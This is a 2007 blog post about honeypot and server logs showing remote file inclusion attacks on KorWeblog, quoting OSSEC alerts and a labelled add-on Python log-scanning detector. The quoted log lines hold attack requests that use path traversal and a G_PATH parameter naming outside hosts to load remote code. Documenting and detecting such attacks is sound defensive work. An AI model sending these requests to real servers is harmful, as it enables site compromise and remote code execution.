Hammered by web attacks (KorWeblog)

Some of my web honeypots are being hammered by attacks against KorWeblog. In fact, even my real systems are receiving a lot of these too. It looks like they are trying to exploit an old vulnerability (from 2005), which sounds odd to me.

Example of alert from ossec:

OSSEC HIDS Notification.
2007 Jun 27 17:07:30

Received From: xx->/var/log/httpd/xx.access.log
Rule: 31106 fired (level 12) -> "A web attack returned code 200 (success)."
Portion of the log(s):
- - [27/Jun/2007:17:07:29 -0300] "GET /install/index.php?lng=../../include/main.inc&G_PATH=http://nicksom2d.sytes.net/ex/echo? HTTP/1.1" 200 6349 "-" "libwww-perl/5.805"

Just one honeypot (yes, one) in the last few days was “attacked” by the following IPs (25 different):

The logs look all the same:

- - [26/Jun/2007:16:37:37 -0300] "GET /*install/index.php?lng=../../include/main.inc&G_PATH=http://www.thiaguinho.net/id.txt? HTTP/1.1" 200 6351 "-" "libwww-perl/5.79"
- - [27/Jun/2007:17:07:29 -0300] "GET /install/index.php?lng=../../include/main.inc&G_PATH=http://nicksom2d.sytes.net/ex/echo? HTTP/1.1" 200 6349 "-" "libwww-perl/5.805"

I posted a few of the sites that were found at the WebAttacks Links in the ossec wiki.
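One way to flag requests like the ones logged above in an Apache combined-format access log, as an added example that is not part of the original post and is not OSSEC's own rule logic. The sample lines are constructed from the entries above with placeholder client addresses, and the function names and severity labels are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample modelled on the entries above. Client addresses are
# placeholders from the documentation range 192.0.2.0/24, and the second
# status code was changed to 404 to show the difference in severity.
SAMPLE_LOG = '''\
192.0.2.10 - - [26/Jun/2007:16:37:37 -0300] "GET /install/index.php?lng=../../include/main.inc&G_PATH=http://www.thiaguinho.net/id.txt? HTTP/1.1" 200 6351 "-" "libwww-perl/5.79"
192.0.2.11 - - [27/Jun/2007:17:07:29 -0300] "GET /install/index.php?lng=../../include/main.inc&G_PATH=http://nicksom2d.sytes.net/ex/echo? HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
192.0.2.12 - - [27/Jun/2007:17:09:02 -0300] "GET /index.php?page=about HTTP/1.1" 200 1822 "-" "Mozilla/5.0"
'''

# Apache combined log format: host ident user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"')
# A query parameter whose value is itself a URL is the mark of these requests.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)

def classify(line):
    """Return a finding for a request carrying a URL in a parameter, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    _, _, query = m['target'].partition('?')
    params = parse_qsl(query, keep_blank_values=True)
    remote = [name for name, value in params if REMOTE_URL.match(value)]
    if not remote:
        return None
    traversal = [name for name, value in params if '../' in value]
    status = int(m['status'])
    return {
        'host': m['host'], 'time': m['ts'], 'status': status, 'agent': m['agent'],
        'remote_params': remote, 'traversal_params': traversal,
        # The request was served (2xx), so review it before the rejected ones.
        'severity': 'high' if 200 <= status < 300 else 'medium',
    }

def scan(log_text):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```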
